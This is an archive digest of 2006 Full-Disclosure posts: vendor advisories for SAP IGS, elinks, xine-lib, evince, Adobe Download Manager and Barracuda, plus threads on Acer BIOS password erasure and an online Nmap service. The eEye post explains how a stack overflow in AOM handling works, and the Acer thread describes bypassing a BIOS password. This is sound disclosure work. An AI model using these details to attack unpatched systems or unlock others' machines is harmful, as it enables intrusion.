[Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Undocumented Features

[Mariano Nuñez Di Croce]

(The following pre-advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf
 )


CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: SAP Internet Graphics Service (IGS) Undocumented Features
==

Vulnerability Class: Undocumented Features


Release Date: 12/05/2006
=

Affected Applications:
==
* SAP IGS 6.40 Patchlevel = 15
* SAP IGS 7.00 Patchlevel = 3


Affected Platforms:
===
* AIX 64 bits
* HP-UX on IA64 64bit
* HP-UX on PA-RISC 64bit
* Linux on IA32 32bit
* Linux on IA64 64bit
* Linux on Power 64bit
* Linux on x86_64 64bit
* Linux on zSeries 64bit
* OS/400 V5R2M0
* Solaris on SPARC 64bit
* TRU64 64bit
* Windows Server on IA32 32bit
* Windows Server on IA64 64bit
* Windows Server on x64 64bit

Local / Remote: Remote
===

Severity: Medium
=

Author:  Mariano Nuñez Di Croce
===

Vendor Status:
==
* Confirmed, update released.

Reference to Vulnerability Disclosure Policy:
=
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
==
The IGS provides a server architecture where data from an SAP System or other 
sources can be used to generate graphical or non-graphical output.

It is important to note that IGS is installed and activated by default with the 
Web Application Server (versions = 6.30)

Vulnerability Description:
==
Undocumented features have been discovered in SAP IGS service, some of which 
may signify security risks.

Technical Details:
==
Technical details will be released three months after publication of this 
pre-advisory. This was agreed upon with SAP to allow their customers to
upgrade affected software prior to technical knowledge been publicly available.

Impact:
===
Successful exploitation of this vulnerability allows to remotely shutdown SAP 
IGS service, access configuration files and to perform unauthorized
actions over service deployment.

Solutions:
==
SAP has released patches that disable the default-enabled access to the service 
HTTP interface. Beside, some commands has been disabled. Affected
customers should apply the patches immediately.
More information can be found on SAP Notes 959358 and 965201.

Vendor Response:

* 06/02/2006: Initial Vendor Contact.
* 06/09/2006: Vendor Confirmed Vulnerability.
* 07/03/2006: Vendor Releases Update for version 6.40.
* 07/13/2006: Vendor Releases Update for version 7.00.
* 10/08/2006: Vendor Confirmed Solution.
* 12/05/2006: Pre-Advisory Public Disclosure.

Special Thanks:
===
Thanks goes to Carlos Diaz and Victor Montero.

Contact Information:

For more information regarding the vulnerability feel free to contact the 
author at mnunez {at} cybsec.com. Please bear in mind that technical details
will be disclosed to the general public three
months after the release of this pre-advisory.


For more information regarding CYBSEC: www.cybsec.com
(c) 2006 - CYBSEC S.A. Security Systems

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1228-1] New elinks packages fix arbitrary shell command execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1228-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
December 5th, 2006  http://www.debian.org/security/faq
- --

Package: elinks
Vulnerability  : insufficient escaping
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-5925
Debian Bug : 399188

Teemu Salmela discovered that the elinks character mode web browser
performs insufficient sanitising of smb:// URIs, which might lead to the
execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in
version 0.10.4-7.1.

For the upcoming stable distribution (etch) this problem has been
fixed in version 0.11.1-1.2.

For the unstable distribution (sid) this problem has been fixed in
version 0.11.1-1.2.

We recommend that you upgrade your elinks package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.dsc
  Size/MD5 checksum:  855 f57923819fa4fce0caca333fb49a08cb

http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.diff.gz
  Size/MD5 checksum:25157 611bbe8d6abbdec32944915213b3ffea

http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4.orig.tar.gz
  Size/MD5 checksum:  3533243 d97d1755f9553a3f5c68a3fe420c6a7c

  Alpha architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_alpha.deb
  Size/MD5 checksum:  1439074 2db129d65122955bd31c6a62700f0843

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_alpha.deb
  Size/MD5 checksum:   764102 0654e01c0d5ee49ddb8d24e01d4bd220

  AMD64 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_amd64.deb
  Size/MD5 checksum:  1364322 aa61b139f250715d1e9cb1725bfa7938

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_amd64.deb
  Size/MD5 checksum:   706090 18b9ebad31887943c0f54aebd0b355d6

  ARM architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_arm.deb
  Size/MD5 checksum:  1314146 21885ec226e0eef970c24d0bda2c087c

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_arm.deb
  Size/MD5 checksum:   664026 f7c2193f6a4a68a090aabafdb7297d1b

  HP Precision architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_hppa.deb
  Size/MD5 checksum:  1376592 3cda3866a1e2fcf13e702e789ed075df

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_hppa.deb
  Size/MD5 checksum:   714314 9e491abd147dc046a3702269d9cd0d1b

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_i386.deb
  Size/MD5 checksum:  1325060 0c438d6afad2fbd82f37fb2a92d2e109

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_i386.deb
  Size/MD5 checksum:   671640 d448bedeaefc0de24d256a862401da14

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_ia64.deb
  Size/MD5 checksum:  1536618 c68927923c69e4d51e35df3bbca94736

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_ia64.deb
  Size/MD5 checksum:   838730 9b10a09bb38f156ab2392774e123ca34

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_m68k.deb
  Size/MD5 checksum:  1282356 ce4945f7b57906ee710bc0fb1fc23d04

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_m68k.deb
  Size/MD5 checksum:   639332 7e01f8968d3d7c3539164bcd5ddfe390

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mips.deb
  Size/MD5 checksum:  1368274 72ad629b2802e1027517694a38c923e2

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_mips.deb
  Size/MD5 checksum:   711436 8fc708e7101e00c668ba06247f851012

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mipsel.deb
  Size/MD5 checksum:  1365494 

[Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

[richard cassidy]

Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
previously set.  This is obviously a bug!  All passwords should not be
wiped out with a bios flash (or at least they weren't on a Dell).  Or,
if they are, it should be stated up front so the passwords can be set
again once the bios is updated'.

https://www.synapsenow.com/synapse/data/7117/documents/AS31-51-5110_Flash_v200.zip

If you forget the bios password, they require the computer to be
mailed to them; then they charge $100USD (citing labor  security).
The work around they don't tell you about is to download the bios
flasher and update your bios.

I tried contacting Acer about this bug and could not reach (was not
transfered) the proper people; I've had teeth pulled that went better
than trying to inform Acer.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

[Tyop?]

On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote:
 Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
 previously set.  This is obviously a bug!  All passwords should not be
 wiped out with a bios flash (or at least they weren't on a Dell).  Or,
 if they are, it should be stated up front so the passwords can be set
 again once the bios is updated'.

Flashing the bios will erase all data.
It's a feature, not a bug.

-- 
Tyop?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

[Valdis . Kletnieks]

On Tue, 05 Dec 2006 22:37:36 +0100, Tyop? said:
 On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote:
  Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
  previously set.  This is obviously a bug!  All passwords should not be
  wiped out with a bios flash (or at least they weren't on a Dell).  Or,
  if they are, it should be stated up front so the passwords can be set
  again once the bios is updated'.
 
 Flashing the bios will erase all data.

So the big question becomes - on an Acer, are the passwords stored in the
BIOS flash memory (in which case, having them evaporate on a BIOS flas is
reasonable), or are they on the NVRAM chip, in which case it's a bug/misfeature?


pgpv3j2wjqmOn.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

[endrazine]

Tyop? a écrit :
 Flashing the bios will erase all data.
 It's a feature, not a bug.

   
Bios passwords are stored on the CMOS, not the Rom itself, so no, it 
doesn't have to be.
On the other side, if you can flash your ROM, you have iopl(3) hence 
root privileges or
at least enougth privileges to get those passwors back (1). So that's 
really no bid deal.

Regards,

endrazine-


(1) 
http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt


side note: I think you both know nothing. Sadly, giving non technical 
_opinions_ has become
the main source of postings on this list.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

[endrazine]

endrazine a écrit :
Just so you know : most Bios settings are stored on the Cmos,
so if you can flash the Rom, you have ioperms at the very least on Cmos 
i/o ports,
so you can reset the whole Cmos anyway.


endrazine-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] EEYE: Adobe Download Manager AOM Stack Buffer Overflow Vulnerability

[eEye Advisories]

eEye Research - http://research.eeye.com

Adobe Download Manager AOM Stack Buffer Overflow Vulnerability

Release Date:
December 5, 2006

Date Reported:
November 10, 2006

Severity:
High (Code Execution)

Systems Affected:
Adobe Download Manager 2.1.x and earlier

Overview:
eEye Digital Security has discovered a stack buffer overflow in Adobe
Download Manager, a utility typically installed for the purpose of
downloading Adobe software such as Adobe (Acrobat) Reader.  By opening a
malicious AOM file, a user's system may be compromised by arbitrary code
within the file, which executes with the privileges of that user.

A web-based attack conducted through Internet Explorer may succeed
without the use of ActiveX or scripting, and without any additional user
interaction other than viewing a web page, if the web server indicates a
Content-Type of application/aom when serving up the malicious AOM
file.  In such a case, an .aom file extension is not required.

Technical Details:
AdobeDownloadManager.exe is responsible for extracting download
instructions from AOM files, which are essentially XML with an appended
CRC32 in decimal, and committing the instructions to the file
%APPDATA%\dm.ini for later processing.  For instance, opening the
following AOM file:

?aom encoding=UTF-8?
AdobeDownloadManager
AOM
DownloadRecord
urlWelcomeToMyHumbleAdobe/url
/DownloadRecord
/AOM
/AdobeDownloadManager3871966612

Will generate the following lines in dm.ini:

[STARTUP]
Status=IncompleteDownload
[WelcomeToMyHumbleAdobe]
StoreID=0
TransactionID=0

When launched, whether or not it is supplied with an AOM file,
AdobeDownloadManager.exe reads the entries from dm.ini and handles
each described download according to its properties.  It begins by
reading a list of section names into a 400h-byte buffer using
GetPrivateProfileStringA, then copies each section name into a 108h-byte
stack buffer using strncpy with a length limit equal to the length of
the section name string.  The result is a relatively straightforward
stack buffer overflow, with the only complication being the character
restrictions.

It should be possible to uninstall Adobe Download Manager, or at least
unassociate the AOM file extension and application/aom Content-Type in
the registry, to defend against this vulnerability.  Hopefully users who
have been forced to install Adobe Download Manager realized its
superfluousness and have already uninstalled it.

Protection:
Retina - Network Security Scanner has been updated to identify this
vulnerability.
Blink - Unified Client Security has proactively protected from this
vulnerability since its discovery.

Vendor Status:
Adobe has released a patch for this vulnerability which is available at
http://www.adobe.com/products/acrobat/acrrmanager.html.  
The vendor bulletin is available at:
http://www.adobe.com/support/security/bulletins/apsb06-19.html.

Credit:
Derek Soeder

Related Links:
Retina - Network Security Scanner - Free Trial:
http://www.eeye.com/html/products/retina/download/index.html
Blink - Unified Client Security Personal - Free For Home Use:
http://www.eeye.com/html/products/blink/personal/download/index.html
Blink - Unified Client Security Professional - Free Trial:
http://www.eeye.com/html/products/blink/download/index.html

Greetings:
Spooky action at a distance.  Whoever else found that kernel race
condition.  Runner-up: Automatically Downloads Malware.  (Thanks
Daniel!)

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this information is at the
user's own risk.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDKSA-2006:224 ] - Updated xine-lib packages fix buffer overflow vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:224
 http://www.mandriva.com/security/
 ___
 
 Package : xine-lib
 Date: December 5, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Buffer overflow in the asmrp_eval function for the Real Media input
 plugin allows remote attackers to cause a denial of service and
 possibly execute arbitrary code via a rulebook with a large number of
 rulematches.

 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 b0aa36d10d1ee53184b345c4a48b6fcb  
2007.0/i586/libxine1-1.1.2-3.2mdv2007.0.i586.rpm
 0c67ca2d47ea5594d2978573205c158f  
2007.0/i586/libxine1-devel-1.1.2-3.2mdv2007.0.i586.rpm
 ee79849493b4b40f207e0e135dc9f4ca  
2007.0/i586/xine-aa-1.1.2-3.2mdv2007.0.i586.rpm
 f0d942949cf3938287e3f4ec44275807  
2007.0/i586/xine-arts-1.1.2-3.2mdv2007.0.i586.rpm
 db80c09dc6050a920aeae2e410ab4471  
2007.0/i586/xine-dxr3-1.1.2-3.2mdv2007.0.i586.rpm
 79f07b0afcbf4682752919829bde6fcf  
2007.0/i586/xine-esd-1.1.2-3.2mdv2007.0.i586.rpm
 51688356ab263c95b051712ed0f70def  
2007.0/i586/xine-flac-1.1.2-3.2mdv2007.0.i586.rpm
 74cd9a178d86754b337e4b1217874863  
2007.0/i586/xine-gnomevfs-1.1.2-3.2mdv2007.0.i586.rpm
 3f331ce5c5463512038ad69a785c9dbe  
2007.0/i586/xine-image-1.1.2-3.2mdv2007.0.i586.rpm
 f147438cd7f07aaf70e1178bd2343133  
2007.0/i586/xine-plugins-1.1.2-3.2mdv2007.0.i586.rpm
 7cb84dbcf336d715b04812fbedb349cf  
2007.0/i586/xine-sdl-1.1.2-3.2mdv2007.0.i586.rpm
 860fe1ca635d076e9bfa1819e7b603cd  
2007.0/i586/xine-smb-1.1.2-3.2mdv2007.0.i586.rpm 
 c7a995ee090abd62b6a580b53e3c3364  
2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 a1a3e704ff2f356784ad084f95d41f74  
2007.0/x86_64/lib64xine1-1.1.2-3.2mdv2007.0.x86_64.rpm
 ee81c8526e7baf295f214338fa3d45cd  
2007.0/x86_64/lib64xine1-devel-1.1.2-3.2mdv2007.0.x86_64.rpm
 bdb0a918df1d9239016741bde0027f3a  
2007.0/x86_64/xine-aa-1.1.2-3.2mdv2007.0.x86_64.rpm
 6cc4cc4b46b3dbeb22364ecc15d9c7d6  
2007.0/x86_64/xine-arts-1.1.2-3.2mdv2007.0.x86_64.rpm
 4d9ce5c5ef2814e2c18dcc60e6270322  
2007.0/x86_64/xine-dxr3-1.1.2-3.2mdv2007.0.x86_64.rpm
 38fe8e37988df8307028778421029349  
2007.0/x86_64/xine-esd-1.1.2-3.2mdv2007.0.x86_64.rpm
 53ccedaeef04ff9b15bcf3d63cdb8663  
2007.0/x86_64/xine-flac-1.1.2-3.2mdv2007.0.x86_64.rpm
 b090fb7ac33b25d310dc8cfc4758062b  
2007.0/x86_64/xine-gnomevfs-1.1.2-3.2mdv2007.0.x86_64.rpm
 51d280def3f6c87276e9b4892c807d38  
2007.0/x86_64/xine-image-1.1.2-3.2mdv2007.0.x86_64.rpm
 fdbfa62329ac6fadba0277db33b71cff  
2007.0/x86_64/xine-plugins-1.1.2-3.2mdv2007.0.x86_64.rpm
 af8dda72b12c9a36d7a51d3d5916bb38  
2007.0/x86_64/xine-sdl-1.1.2-3.2mdv2007.0.x86_64.rpm
 dea73578f285ebe1b1aac769cc0a549a  
2007.0/x86_64/xine-smb-1.1.2-3.2mdv2007.0.x86_64.rpm 
 c7a995ee090abd62b6a580b53e3c3364  
2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm

 Corporate 3.0:
 e27a1f3f0a92a65ea9673d0aa7bd9660  
corporate/3.0/i586/libxine1-1-0.rc3.6.14.C30mdk.i586.rpm
 cef9a906baabe8c8e18bbe45762268fd  
corporate/3.0/i586/libxine1-devel-1-0.rc3.6.14.C30mdk.i586.rpm
 5260c623ea029663a3166c8e350b6306  
corporate/3.0/i586/xine-aa-1-0.rc3.6.14.C30mdk.i586.rpm
 aa8ed9640d1e42608f1cd531d4d00dd6  
corporate/3.0/i586/xine-arts-1-0.rc3.6.14.C30mdk.i586.rpm
 1d311b51dc2ea55a1590ef409bfd9d9f  
corporate/3.0/i586/xine-dxr3-1-0.rc3.6.14.C30mdk.i586.rpm
 d8602b10e1b5b0ea29959c981bf5866e  
corporate/3.0/i586/xine-esd-1-0.rc3.6.14.C30mdk.i586.rpm
 ba65fc2fa69c85b848f7fe5728381003  
corporate/3.0/i586/xine-flac-1-0.rc3.6.14.C30mdk.i586.rpm
 bbf13c446ebf132b6a474a9bf4a300cd  
corporate/3.0/i586/xine-gnomevfs-1-0.rc3.6.14.C30mdk.i586.rpm
 18168e188258d645ba33103a743af3cb  
corporate/3.0/i586/xine-plugins-1-0.rc3.6.14.C30mdk.i586.rpm 
 11ff55c81b52559ff1b08bab917d63db  
corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.14.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 fad4ae51ebdd06fe3b3f7848994bc7f0  
corporate/3.0/x86_64/lib64xine1-1-0.rc3.6.14.C30mdk.x86_64.rpm
 0aeb5bb0a613d0fa13788c7f2c64c871  
corporate/3.0/x86_64/lib64xine1-devel-1-0.rc3.6.14.C30mdk.x86_64.rpm
 755ab190b656fdbb9313189cce7f5a80  
corporate/3.0/x86_64/xine-aa-1-0.rc3.6.14.C30mdk.x86_64.rpm
 ecf0b4ee0c12d1506432c297080bbb67  
corporate/3.0/x86_64/xine-arts-1-0.rc3.6.14.C30mdk.x86_64.rpm
 8433359eaa5ec8987efe65e6ada96132  
corporate/3.0/x86_64/xine-esd-1-0.rc3.6.14.C30mdk.x86_64.rpm
 bbb1ac4807f1e8a7960d8704c79c6134  
corporate/3.0/x86_64/xine-flac-1-0.rc3.6.14.C30mdk.x86_64.rpm
 356f64f53ce7d552acc239cde30b60ea  

Re: [Full-disclosure] Nmap Online

[Simon Smith]

Why would you do this?


On 11/28/06 3:19 AM, David Matousek [EMAIL PROTECTED] wrote:

 Hello,
 
 For all Nmap fans, our group have implemented Nmap Online service.
 Its address is http://nmap-online.com/. The interface allows you to perform
 custom
 Nmap scans from our server with only a few limitations in the syntax.
 The service is free and can be used immediately, no registration is required.
 
 Please direct your questions and suggestions to our emails.
 
 
 Regards,


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

[Simon Smith]

You have experience in disarming land mines with a hammer while you are
stark naked? 

Now that¹s a real man¹s job!


On 11/27/06 4:20 PM, Brian Eaton [EMAIL PROTECTED] wrote:

 On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote:
 There is no hocus pocus here. Look at /var/log/secure and fine the term
 error retrieving and print the next line, 13th column. Then sort it and
 print the unique entries into /tmp/hosts.deny. After you do this, compare
 /tmp/hosts.deny with /etc/hosts.deny and put the differences not in
 /etc/hosts.deny
 into /etc/hosts.deny
 
 Parsing malicious input with shell commands is like disarming land mines with
 a hammer. 
 
 And doing it as root?  That's like disarming land mines with a hammer while
 you're stark naked.
 
 Regards,
 Brian
  
 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Nmap Online

[Ed Carp]

On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote:

 Why would you do this?

Well, for one, sometimes you need to do a port scan when you're not in
front of a system that has nmap installed on it.  I get a call about
once every couple of months, why can't I get into my email server
that's sitting behind a hardware router with a hole poked in it for
port 110.  Doing a port scan on the client's IP address ensures that
either yes, the port is open or no, it's not.  If it's open then I can
proceed with my troubleshooting - if not, I know where to look for the
problem.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-390-2] evince vulnerability

[Kees Cook]

=== 
Ubuntu Security Notice USN-390-2  December 06, 2006
evince vulnerability
CVE-2006-5864
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  evince   0.4.0-0ubuntu4.3

Ubuntu 6.06 LTS:
  evince   0.5.2-0ubuntu3.2

Ubuntu 6.10:
  evince   0.6.1-0ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-390-1 fixed a vulnerability in evince.  The original fix did not 
fully solve the problem, allowing for a denial of service in certain 
situations.

Original advisory details:

  A buffer overflow was discovered in the PostScript processor included 
  in evince.  By tricking a user into opening a specially crafted PS 
  file, an attacker could crash evince or execute arbitrary code with 
  the user's privileges.


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.diff.gz
  Size/MD5:11703 57da8bfc0ad787ae9c8ecd69c517249c

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.dsc
  Size/MD5: 1873 72d17a9bdb8a65e1a240834099cfdbe6

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0.orig.tar.gz
  Size/MD5:  1172276 9c1009e3dae55bcda1bc5204f021ad1b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_amd64.deb
  Size/MD5:   652508 2815d3389a1260c6388485b71c3bb5b1

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_i386.deb
  Size/MD5:   602688 3f7768319e1d5f8f3a3131cf23856c86

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_powerpc.deb
  Size/MD5:   637256 0c2653001eb6c40e0a3228f8dd49598f

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_sparc.deb
  Size/MD5:   616900 ade92071c11fd148af61ec3f57900ea3

Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.diff.gz
  Size/MD5:11818 e485f45171c5558cb7d7fec930f050ba

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.dsc
  Size/MD5: 1977 15a5db1f73061fbf0d468e9c4a8fe0c7

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2.orig.tar.gz
  Size/MD5:  1362513 5020afb1768d89c251ad8c2a233d9fcf

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_amd64.deb
  Size/MD5:   747902 8f75cb0125481699918dfd23c3d81718

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_i386.deb
  Size/MD5:   692882 392d072d36c0c200f14ff44c5dd40858

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_powerpc.deb
  Size/MD5:   729070 d5053fd093002988670243a050f8be1f

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_sparc.deb
  Size/MD5:   704756 19aa53d800f922641d8660417a982fc4

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.diff.gz
  Size/MD5: 7742 31f26b98ab68c5c9f7bb9a133ddec8f3

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.dsc
  Size/MD5: 1679 6e3252457e5c8703932a04804c2af514

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1.orig.tar.gz
  Size/MD5:  1687870 665387e278d4da97f7540aeddeaae57d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_amd64.deb
  Size/MD5:   944244 bbcc0ea3a31c4f71c528dbf4d144f0e3

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_i386.deb
  Size/MD5:   901854 ab0b5badc19b9c7665dee69ab937dd02

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_powerpc.deb
  Size/MD5:   926276 fda07c35d1f38589f515720772888785

  sparc architecture (Sun SPARC/UltraSPARC)

Re: [Full-disclosure] Nmap Online

[Greg]

 -Original Message-
 From: Ed Carp [mailto:[EMAIL PROTECTED] 
 Sent: Wednesday, 6 December 2006 2:06 PM
 To: full-disclosure@lists.grok.org.uk
 Cc: David Matousek
 Subject: Re: [Full-disclosure] Nmap Online
 
 
 
 On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote:
 
  Why would you do this?
 
 Well, for one, sometimes you need to do a port scan when 
 you're not in front of a system that has nmap installed on 
 it.  I get a call about once every couple of months, why 
 can't I get into my email server that's sitting behind a 
 hardware router with a hole poked in it for port 110.  Doing 
 a port scan on the client's IP address ensures that either 
 yes, the port is open or no, it's not.  If it's open then I 
 can proceed with my troubleshooting - if not, I know where to 
 look for the problem.
 

I don't wish to upset anyone but that answer has to be the craziest FIRST
port of call approach I have seen used. I get plenty of those sorts of
calls. I take about 30 seconds time on the phone for almost all of them. I
say Pull the power plug out of the router. Wait 10 seconds, plug it back in
and wait another 10 seconds. OK, try now and almost all of them report it
works well.

So why would I need and how could I use Nmap online to tell me the router
went crazy and locked up?

Besides, wouldn't it be just as easy to use the Nmap sitting on my computer
if I decided I needed to use it?

Greg.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Barracuda Convert-UUlib library buffer overflow leads to remote compromise

[Jean-Sébastien Guay-Leroux]

Topic:  Barracuda Convert-UUlib library buffer
overflow leads to remote compromise

Announced:  2006-12-05
Product:Barracuda Spam Firewall
Vendor: http://www.barracudanetworks.com/
Impact: Remote shell access
Affected product:   Barracuda Spam Firewall with firmware 
3.3.15.026 AND virus definition  2.0.325
Credits:Jean-Sébastien Guay-Leroux
CVE ID: CVE-2005-1349


I.  BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software
solution for complete protection of your email server. It provides a
powerful, easy to use, and affordable solution to eliminating spam and
